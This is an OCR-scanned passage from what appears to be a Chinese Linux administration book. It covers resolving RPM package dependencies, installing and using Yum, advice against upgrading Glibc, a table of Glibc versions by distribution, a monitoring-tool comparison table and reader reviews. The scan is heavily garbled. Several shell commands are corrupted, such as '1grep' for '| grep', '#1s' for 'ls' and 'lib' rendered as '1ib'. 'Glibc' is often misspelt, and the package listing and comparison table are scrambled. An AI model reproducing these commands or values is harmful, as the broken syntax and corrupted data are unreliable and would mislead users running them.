/usr/lib/vmware-tools/1ib32/libcrypto.so.0.9.8/libcrypto 


/usr/lib/vmware-tools/1ib64/libcrypto.so.0.9.8 


/usr/lib/vmware-tools/1ib64/libcrypto.so.0.9.8/libcrypto 


如 果 此 命令 没有 在 系统 上 找到 liberypto 共享 库 文件 , 可 以 到 Internet 上 找 出 哪个 共享 库 软 
件 包 包含 此 共享 库 文件 。 完 成 此 项 工具 的 一 个 快速 和 简便 方法 是 ， 只 要 在 http://RPMfind.net 
上 将 共享 库 的 名 称 输入 到 搜索 栏 中 ， 就 可 以 查 到 。 如 果 将 文本 libcrypto.so 输入 到 此 搜索 栏 中 ， 


将 很 快 知道 此 共享 库 是 由 openssl 软件 包 提 供 的 ， 如 图 A.1 所 示 。 


=a0=9=0 
.0.9.8/libcrypto.s 


SS9s9 
.0.9.8/libcrypto.s 


.S50.0.9.8 


-30.0.9.8 
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图 A.1 利用 RPMfind.net 网 络 查找 包 的 共享 库 文件 


如 果 老 版 本 的 共享 库 数据 包 已 经 安装 在 系统 上 , 可 以 用 如 下 的 命令 确认 此 软件 是 否 包 含 你 
所 需要 的 共享 库 文件 : 


#rpm -q --provides openssl 
[root@localhost ~]# rpm -q --provides openssl 
config(openssl) = 0.9.8b-10.el5 
lib4758cca.so 

libaep.so 

libatalla.so 

libchil.so 

libcrypto.so.6 

libcswift.so 

libgmp.so 

libnuron.so 

libssl.so.6 

libsureware.so 

libubsec.so 

openssl = 0.9.8b-10.el15 


此 命令 报告 此 RPM 软件 包 中 提供 的 所 有 内 容 ( 这 包括 软件 包 提 供 的 共享 库 文件 的 
soname ) 。 注 意 : 正如 前 面 指出 的 ， 共 享 库 软件 包 版 本 号 没有 并 且 应 该 没有 与 共享 库 文件 
(soname) 版 本 号 的 任何 对 应 关系 。 这 里 不 进行 这 方面 的 讨论 ， 因 为 soname 符号 链接 可 能 指 
向 不 同 版 本 的 共享 库 文件 , 这 也 是 尽量 避免 在 安装 新 版 本 的 共享 软件 包 时 , 中 断 现 有 动态 可 执 
行文 件 的 情况 下 完成 的 。 


*526* 
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A.5 自动 解决 依赖 性 故障 


当 使 用 RPM 软件 包 来 生成 、 升 级 或 添加 新 的 特性 到 系统 时 ， 依 赖 性 故障 可 能 很 快 变 成 一 
场 恶 梦 。 只 要 通过 使 用 你 的 发 行 版 供应 商 的 升级 服务 或 工具 ,就 可 以 避免 这 场 路 梦 。 例如 ， 当 
选择 要 安装 的 RPM 软件 包 时 ，Red Hat 工具 up2date 自动 从 Red Hat 下 载 并 安装 所 有 RPM 依 
赖 性 。 还 有 一 个 解决 依赖 性 问题 的 、 支 持 社区 的 免费 方法 是 使 用 网 站 http://www.RPM .org/。 
下 面 我 们 来 看 一 下 这 些 自动 更 新 工具 中 的 一 种 ， 即 Yum。 


A.5.1 使 用 Yum 来 安装 RPM 软件 包 


Yum (Yellow dog Updater，Modified) 程序 〈 作 为 RPM 软件 包 ) 可 以 从 下 面 网 址 下 载 : 
http://yum.baseurl.org/download/3.4/yum-3.4.3.tar.gz。 
下 载 此 软件 包 后 ， 可 以 使 用 下 面 的 命令 像 任何 其 他 RPM 软件 包 那 样 安装 它 : 


#rpm -ivh yum* 


你 可 能 需要 更 新 想 用 于 下 载 你 的 RPM 软件 包 的 存储 库 。 有 关 Fedora 的 可 用 Yum 存储 库 
的 清单 可 以 在 http://www.fedoratracker.org 查 到 。 要 切换 到 不 同 的 存储 库 ， 下 载 这 些 文件 中 的 
一 个 文件 ， 并 将 该 文件 作为 /etc/yum.conf 文件 安装 。 现 在 可 以 用 下 面 的 命令 报告 存储 在 Yum 
RPM Internet 存储 库 中 、 可 用 于 安装 的 所 有 软件 包 : 


#yum list 

[root@localhost ~]# yum list |more 
This system is not registered with RHN. 
RHN support will be disabled. 

Loading "security" plugin 

Loading "rhnplugin" plugin 

Installed Packages 


Deployment Guide-en-US.noarch Ss installed 
Deployment Guide-zh-CN.noarch a installed 
Deployment Guide-zh-TW.noarch 9 installed 
GConf2.i386 2-14.0-9-el5 installed 
GConf2-devel.i386 2.14.0-9.e15 installed 
ImageMagick.i386 6.2.8.0-4.e15 1.1 installed 
MAKEDEV .i386 Ep 上 installed 
MySQL-python.i386 201s 让 installed 
NetworkManager.i386 1:0.6.4-8.el15 installed 
NetworkManager-glib.i386 LTO As8es installed 


A.5.2 使 用 Yum 安装 新 的 Glibc 软件 包 
在 本 示例 中 , 将 安装 新 的 Glibc 软件 包 。 用 简单 的 命令 安装 最 新 的 Glibc 及 其 所 有 依赖 性 : 


#yum update glibc 
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如 果 一 切 正常 ，Yum 程序 将 自动 检测 、 下 载 并 安装 最 新 Glibe 软件 包 所 需要 的 所 有 RPM 
软件 包 〈 这 里 的 Glibe 软件 包 是 为 你 的 发 行 版 构建 的 ， 不 一 定 是 可 用 的 最 新 版 Glibe 软件 包 ， 
使 用 发 行 版 所 批准 的 Glibc 共 享 库 软件 包 版 本 号 或 冒险 安装 没有 使 用 正常 系统 操作 所 需要 的 动 


态 可 执行 文件 的 Glibe 软件 包 版 本 ) 。 也 可 以 将 list 参数 用 于 Yum 和 
的 软件 包 。 例 如 ， 要 查找 名 称 中 有 SNMP 的 软件 包 ， 可 输入 如 下 代码 


# Yum list lgrep snmp 


此 命令 返回 如 下 报告 : 


This system is not registered with RHN. 


RHN support will be disabled. 


net-snmp.i386 bp 
net-snmp-libs.i386 e524 EE 
net-snmp-perl.i386 e524 eS 
net-snmp-utils.i386 i 


grep 命令 来 查找 要 安装 


installed 
installed 
installed 
installed 


接 下 来 就 可 以 很 容易 地 使 用 Yum 下 载 并 安装 所 有 这 些 RPM 软件 包 。 


A.6 ”关于 升级 Gilbc 的 建议 


Glibe 库 是 Linux 底层 的 运行 库 , 其 性 能 对 于 整个 系统 的 运行 有 着 


重要 的 意义 。Glibe 库 包 


含 大 量 函 数 ， 其 中 的 函数 可 大 致 分 成 两 类 , 一 类 是 与 操作 系统 核心 沟通 的 系统 调用 接口 ,它们 


作为 功能 型 函数 被 调用 ， 提 供 对 Linux 操作 系统 调用 的 包装 与 预 处 理 


E。 另 外 一 类 为 一 般 的 函 


数 对 象 ， 它 们 提供 了 经 常 使 用 的 功能 的 实现 ， 作 为 工具 型 函数 使 用 ，Glibe 与 各 工具 的 依赖 关 


系 如 图 A.2 所 示 。 
图 A.2 Glibc 与 各 工具 的 依赖 关系 
A.2 说 明 如 下 : 


@ Gocc 依赖 于 Glibc。 


@ Binutils 依赖 于 Glibc。Binutils 提供 了 一 系列 用 来 创建 、 管 理 和 维护 二 进 制 目标 文件 的 
工具 程序 ， 如 汇编 (as) 、 连 接 (14) 、 静 态 库 归档 (ar) 、 反 汇编 。 


Linux 系统 软件 包 的 依赖 性 问题 附录 /A 


@ Make 依赖 于 Glibc。 


@ 头 文件 是 在 编译 时 Gee 所 需要 的 ， 但 本 身 都 是 一 些 文本 文件 ， 因 此 没有 需要 的 运行 环 


境 。 


@ 常用 工具 依赖 于 Glibc 和 各 种 需要 用 到 的 动态 库 。 
在 实践 中 ， 有 不 少 软件 就 是 依赖 于 Glibc 版 本 才能 安装 并 运行 ， 对 于 Glibe 版 本 要 求 是 版 
本 高 了 不 行 ， 低 了 也 不 成 。 这 些 编译 环境 中 的 应 用 程序 也 和 其 他 程序 一 样 必 须 有 运行 的 环境 ， 


有 时 管理 员 在 生产 中 给 服务 器 安装 了 最 新 的 Linux 发 行 版 ， 结 果 应 用 软件 装 不 上 去 ， 原 


因 是 


Glibec 的 版 本 不 对 ， 有 的 是 写 在 原 发 行 版 Glibc 上 升级 有 的 是 降级 ， 结 果 导 致 整个 系统 的 崩溃 ， 
实践 经 验证 明 ， 只 有 选择 相应 Linux 发 行 版 里 对 应 的 Glibe 才 行 ， 例 如 单位 的 一 个 应 用 软件 是 


在 RHEL 3.0 下 开发 的 ， 那 么 就 得 要 对 应 的 发 行 版 ， 换 了 别 的 就 难说 了 ， 任 何 自己 升级 或 


降级 


Glibe 来 适应 应 用 软件 的 做 法 都 是 不 可 取 的 ， 最 终 的 解决 方法 是 找到 RHEL 3.0 并 安装 就 能 解 
决 相应 的 问题 。 如 表 A.1 所 示 , 笔者 把 几 个 Linux 发 行 版 原配 的 Glibe 版 本 列 出 ， 供 大 家 参考 。 


表 A.1 Linux 发 行 版 Glibc (32 位 ) 


Linux 发 行 版 Glibc 版 本 
Red Hat 9 Glibc-2.3.2-5 
Fedora 1 Glibc-2.3.2 
Red Hat Enterprise Linux As 3 Glibc-2.3.2-95 
Red Hat Enterprise Linux As 4 Glibc-2.3.4 
Red Hat Enterprise Linux 5 Glibc-2.5-24 
Red Hat Enterprise Linux 6 Glibc-2.9 
CentOS 5.x Glibc-2.5 
SUSE Linux Enterprise Server 9 Glibc-2.3.2-92 
SUSE Linux Enterprise Server 10 Glibc-2.4.31.54 
SUSE Linux Enterprise Server 11 Glibc-2.9 


下 面 介 绍 几 个 查询 Glibc 版 本 号 的 方法 : 
#1s -al /lib/libc* 


或 者 使 用 下 面 的 命令 也 可 以 实现 : 


#rpm -qaqp 1grep glibc 


基于 Debian 的 系统 通过 dpkg -1 | grep libc6 命令 也 可 以 查 到 ， 总 之 ， 一 般 在 /usr/share/doc 


目录 下 都 能 看 到 Glibe 的 相关 信息 。 


A7 总 结 
大 部 分 情况 下 , 在 遇 到 软件 包 依赖 关系 问题 的 时 候 , 操作 系统 提供 的 文件 名 字 与 软件 包 名 


Linux ”企业 应 用 案例 精 解 


字 都 会 有 直接 的 联系 。 有 可 能 文件 的 名 字 就 是 软件 包 的 名 字 。 但 是 ， 有 些 时 候 文件 的 名 字 与 软 
件 包 的 名 字 会 相差 甚 远 。 大 部 分 系统 管理 员 可 能 光 赁 文件 名 字 无 法 找到 对 应 的 软件 包 ， 此 时 ， 
可 以 先 在 系统 安装 光盘 里 查找 , 如 果 找 到 就 是 最 佳 选 项 , 否则 就 需要 借助 笔者 上 面谈 到 的 一 些 
专业 网 站 去 查询 软件 包 的 名 字 。 当 系 统管 理 员 安装 了 某 个 软件 之 后 , 如 果 存在 软件 包 之 间 的 依 
赖 关系 ， 则 最 好 能 够 拿 本 子 或 者 通过 其 他 手段 记录 下 来 ， 以 方便 下 次 再 碰 到 时 查阅 使 用 。 只 要 
注意 工作 中 经 验 技巧 的 积累 ， 相 信 绝 大 部 分 的 软件 包 依赖 关系 问题 都 会 迎刃而解 。 
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附录 B 开源 监控 软件 比较 


名 称 msiA 报告 | 自 动 发 现 本 区 Syslog 。 ”|Plugins| 分 布 式 | 平台 web 前 端 | 数据 存储 方式 授权 拓扑 图 | 访问 控制 
Cacti IYES YES INO |YES YES YES |YES LAMP YES RRDtool MYSQL |GPL YES YES 
Munin INO NO YES 
Nagios 通过 插件 “| 通过 插件 支持 
openNMS |YES YES 支持 
Zabbix YES YES 支持 
Zenoss YES YES 支持 
MRTG INO YES INO 
Ntop YES YES 支持 
(Ganglia No 通过 gmond 检查 | 支持 | 通 ; 
Pandora FMS |YES YES YES 
Ossim IYES YES YES 
注意 : 
@ IP SLA 报告 : 代表 支持 Cisco 的 IP SLA 方法 ， 通 过 它 可 以 进行 网 络 点 到 点 的 可 用 性 
检测 以 及 VOIP 网 络 监 测 。 
@ 自动 发 现 : 自动 发 现 网 络 和 网 络 上 的 主机 。 
@ Agent: “NO” 代 表 不 支持 , “支持 ”表示 Agent 可 以 使 用 ， 但 不 强制 使 用 。“Yes” 表 


示 它 依赖 Agent 程序 的 运行 。 


附录 C 本 书 第 一 版 读者 评价 


以 下 例 举 了 本 书 第 一 版 在 互联 网 各 大 图 书 网 站 上 读者 评价 ， 供 大 家 参考 。 
1. 网 友 “ 许 先 ” 评 论 
这 本 书 网 站 、 数 据 库 、 集 群 和 备份 这 几 章 写 得 非常 细 ， 还 有 监控 Ossim、LDAP 等 内 容 都 


是 其 中 的 亮点 ， 都 看 完了 ， 总 体感 觉 讲 解 比较 到 位 ， 比 较 细致 ， 尤 其 是 集群 的 那个 实验 ， 以 前 
在 网 上 找 了 好 多 资料 就 是 没 弄 好 ， 经 过 书 中 的 梳理 ， 这 个 实验 也 做 好 了 。 


2. 网 友 少 奇 评论 


Linux 案例 这 本 书 看 了 一 多 半 了 ， 大 部 分 还 是 对 我 工作 有 帮助 的 ， 没 有 有 些 书 那么 多 理论 
什么 的 ， 都 是 实 实在 在 的 ， 能 看 出 来 都 是 作者 的 经 验 之 谈 ， 挺 有 责任 心 的 ， 还 搞 了 个 网 站 视频 
什么 的 ， 不 过 说 实在 的 ， 我 就 是 从 作者 的 博客 开始 学 习 起 的 ， 非 常 不 错 ， 我 学 到 了 好 多 东西 。 

3. 网 友 “ 诗 乐 ”评论 

我 大 学 里 学 了 点 Linux, 那 都 是 皮毛 , 太 肤 浅 了 ,工作 以 后 买 了 几 本 Linux 教程 ,例如 《Linux 
入 门 到 精通 》 以 及 两 本 鸟 哥 的 书 ， 感 觉 遇 到 Linux 项 目 就 犯 举 ,不 知道 怎么 解决 问题 ， 后 来 经 


同事 介绍 ， 买 了 本 Linux 企业 案例 ， 有 几 个 案例 正好 是 我 上 回 碰 到 的 , 里 面 的 方式 方法 和 解决 
问题 的 思路 值得 学 习 。 

4. 网 友 “ 时 光 ” 评 论 

因 本 人 最 近 关注 Oracle Rac 的 原因 ,特别 看 了 书 中 Oracle Rac 部 分 ,说 得 很 仔细 , 截图 说 
明 也 很 到 位 。 这 是 本 很 好 的 书 , 适合 珍藏 , 企业 Linux 案例 都 有 说 明 。 市 面 上 像 这 类 型 的 Linux 
方面 的 书 不 多 ,内容 挺 不 错 的 ， 对 我 们 学 习 很 有 帮助 。 作 者 自己 建 了 个 网 站 用 于 存放 一 些 重要 
资料 和 案例 ， 后 期 的 互动 是 其 他 很 多 图 书 没有 的 ， 体 现 了 作者 追求 质量 和 持续 改进 的 精神 。 


5. 网 友 “ 浩 林 ” 评 论 
从 事 Linux 教学 工作 也 有 几 年 ， 总 是 局 限 在 系统 操作 和 常用 服务 配置 上 。 看 了 这 本 书 , 我 
对 Linux 的 数据 库 、 中 间 件 、 集 群 和 双 机 等 Linux 企业 应 用 扩充 了 视野 ， 同 时 对 这 些 技术 有 了 


进一步 深入 了 解 ， 觉 得 Linux 还 能 在 这 些 领域 发 挥 作用 ， 让 我 再 次 燃 起 了 学 习 Linux 的 斗志 。 
正如 其 他 读者 的 感慨 一 样 ， 这 的 确 是 本 难得 的 好 书 ， 也 希望 作者 能 多 出 些 这 种 实战 类 图 书 。 


